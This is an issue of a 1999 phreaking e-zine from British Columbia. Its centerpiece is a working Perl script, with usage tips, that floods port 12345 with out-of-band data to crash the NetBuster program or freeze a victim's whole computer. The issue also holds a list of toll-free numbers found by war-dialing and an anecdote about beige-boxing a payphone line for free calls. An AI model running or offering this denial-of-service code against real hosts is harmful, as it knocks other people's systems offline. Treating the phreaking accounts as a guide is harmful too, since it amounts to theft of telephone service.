__________________________________________________________________
BCHell: The Definitive guide to phreaking in 250/604 
Volume 1 Issue 4 
19.10.1999
Editor-in-Chief: 
Doktor Che (doktor_che@hotmail.com)             

Contributing Editors:               
Mister Roboto (mr_roboto@fnkewl.com)


If you're stupid enough to do this shit and get caught, its your own fault.
No one involved with this magazine have ever done any of it.
If you blame us for making you do it, the cops will probably laugh at you.
We told you not to.
			      
	

CONTENTS:
___________

Intr0.
By DoktorChe

Crashing Netbuster
By Doktor Che

Random Scanning
By Mister Roboto

Story Time with Mister Roboto
By Mister Roboto
__________________________________________________________________      

Intr0.
by Doktor Che

Welcome to Fantasy Island...er..Issue Four.  
Back from Kamloops is our longtime friend NiNJA-X, who will be heading our 
Violence Desk. We hope he provides all sorts of enlightening articles about
kicking ass. If not, we'll take him out back and break his ankles. Seriously.
He's had two months now, and come up with nada.
Mister Roboto will no longer be with us after this issue. I haven't heard from him
in a long time, which is odd, as he only lives a few blocks from me. Oh, well.
Maybe he'll surprise us all and come out of hiding.
__________________________________________________________________      
Crashing Netbuster 
By Doktor Che

Sometimes I'll go on IRC and scan for NetBusted people.
I like to help out the average jerk who too dumb to figure out
the "mondo-leeto-p0rn.exe" isn't what they think it is.
I tell them what I've discovered and maybe direct them to a
helpful URL. No harm done, and everyone is happy, right?
Not always. If someone is running Netbuster, a simple  portscan
will set them off. Then they start screaming about logs this and
ISP that. I've written a perl script that will, at best, crash 
Netbuster and at worst, lock up the whole damn system. Hard. 

<snip-perl-code-here>
#!/usr/bin/perl 

#based on a perl version of winnuke.c and my own sweet touch :-)
#By Doktor Che 

use strict; use Socket; 

my($h,$p,$in_addr,$proto,$addr); 


$h = "$ARGV[0]"; $p = 12345 if (!$ARGV[1]); 
if (!$h) { print "A hostname must be provided. \n"; } 

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); 
$proto = getprotobyname('tcp'); 
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; 
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; 


print "Please wait while Netbuster crashes ;->\n";

#null characters hurt more..
 send S,"__0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0
_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0
_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0
_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0
_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0_0
_0_0_0",MSG_OOB; print "Got 'em.\n"; close S;

<end-of-perl-code>

It seems to work best when they victim has Netbuster set to "Send Messages 
and Disconnect". If you get an error message, then your mark is offline or not
running Netbuster. But this is a defensive tool, remember?
Netbuster won't log anything after the first attack, and occaisionally,
two hits is required to lock up the 'puter. The biggest drawback is that
the address has to be in "victim1.dialup.isp.com" format, not numeric
"127.0.0.1" format. I suck.

__________________________________________________________________      
Random Scanning
By Mister Roboto

The following is a list of interesting 1-800-267-XXXX numbers

1-800-267-9382: Nothing
1-800-267-4522: Voice Mail
1-800-267-9926: Modem (Washington Apple Commitee)
1-800-267-1158: Some Store
1-800-267-9423: Fax
1-800-267-8829: Fax
1-800-267-9123: No Answer
1-800-267-6643: AT&T Easy Reach 800 
1-800-267-4848: Voice Mail Direct
1-800-267-5552: World Wide Travel
1-800-267-4443: Some Store
1-800-267-9999: Travel Quest
1-800-267-1111: Some Jerk's House
1-800-267-2267: An Office Somewhere
1-800-267-4499: No Answer
1-800-267-1553: Voice Mail (En Francais)
1-800-267-5515: MCOM Products
1-800-267-4491: Pager
1-800-267-8099: Some Office
_______________________________________________________________      
Story Time with Mister Roboto 
By Mister Roboto

This is a story about myself and Doktor Che. 
One fine summer's day we decided to take a walk down to the park
to check out who was there. We got our phreaking gear together and
put it in our packs and headed off. It was the usual long, hot walk 
but at least it wasn't boring. When we got to the park, we checked  
it out for cuties, and finding none, we hit the payphones.
Doktor Che had beige boxed the payphone a day or two before and
wanted to show me. (I had attached my clips to the yellow and black 
wires. I got a fuzzy, yet working connection, free. --Doktor Che)
He climbed the telephone pole and started boxing when a a BCTel van
pulled up.  A scary thought as the RCMP station was about a 100 ft.
away.
(The phrase "Shit your fucking pants" comes to mind -Che)

Doktor Che jumped down off the pole and stuffed his box into his 
pack, but apparently the van had only stopped for the stop sign.

(Whoot! Excitement! I think that was the same day I electrocuted
myself the second time I pulled that stunt. -Che)

Next time, Mister Roboto tells the story of the Phreaks and the
Undercover Cops.
__________________________________________________________________      

Next Issue:

Aww, who the hell knows?






